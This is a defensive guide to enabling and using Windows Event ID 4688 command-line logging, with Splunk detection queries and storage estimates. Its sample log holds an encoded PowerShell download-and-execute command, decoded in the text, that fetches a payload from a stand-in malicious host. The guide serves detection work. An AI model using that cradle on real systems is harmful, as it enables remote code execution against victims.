Event ID 4688 — A new process has been created — is one of the highest-value events in Windows security logging when properly configured. Without command line logging enabled, it records only that a process spawned. With it enabled, it records
the full command line including all arguments. The difference between these two states is enormous for investigation purposes.
Configuration — two steps, both required
Step 1: Enable Audit Process Creation via Group Policy or local policy:
Computer Configuration
Windows Settings
Security Settings
Advanced Audit Policy Configuration
Detailed Tracking
Audit Process Creation: Success
Step 2: Enable command line logging via registry:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" \ /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
Verify both are active:
auditpol /get /subcategory:"Process Creation" # Process Creation Success reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" \ /v ProcessCreationIncludeCmdLine_Enabled # ProcessCreationIncludeCmdLine_Enabled REG_DWORD 0x1
What a 4688 event looks like with command line logging enabled
Log Name: Security Event ID: 4688 Task: Process Creation New Process Information: New Process ID: 0x1a4c New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: TokenElevationTypeFull (2) Mandatory Label: High Mandatory Level Creator Process Name: C:\Windows\System32\cmd.exe Creator Process ID: 0x0f20 Process Command Line: powershell.exe -NonInteractive -NoProfile -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA=
Decoding the base64:
echo "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA=" \
| base64 -d | iconv -f utf-16le -t utf-8
# IEX (New-Object Net.WebClient).DownloadString('https://malicious.example/payload')
Detection patterns in Splunk
Suspicious encoded PowerShell:
index=wineventlog EventCode=4688
(Process_Command_Line="*-EncodedCommand*" OR Process_Command_Line="*-enc *")
| eval decoded=base64decode(replace(
mvindex(split(Process_Command_Line, " "), -1),
" ", "+"))
| table _time, host, New_Process_Name, Process_Command_Line, decoded
Net commands used for domain reconnaissance:
index=wineventlog EventCode=4688 New_Process_Name="*\net.exe" OR New_Process_Name="*\net1.exe" (Process_Command_Line="* user *" OR Process_Command_Line="* group *" OR Process_Command_Line="* localgroup *") | stats count by host, Account_Name, Process_Command_Line | sort -count
WMI spawning child processes (lateral movement indicator):
index=wineventlog EventCode=4688
Creator_Process_Name IN ("*\WmiPrvSE.exe", "*\wmiprvse.exe")
NOT New_Process_Name IN ("*\WmiPrvSE.exe", "*\conhost.exe")
| table _time, host, Creator_Process_Name, New_Process_Name, Process_Command_Line
Storage volume estimate
On an average enterprise workstation generating approximately 200 process creation events per hour, Event ID 4688 with command line logging adds roughly 15-25MB of raw event log data per day per endpoint. At 1,000 endpoints this is 15-25GB/day.
In a SIEM with compression and indexing, budget approximately 5-8GB/day at that scale. The cost is worth it — process creation logs are the single most consistently useful data source in incident investigations.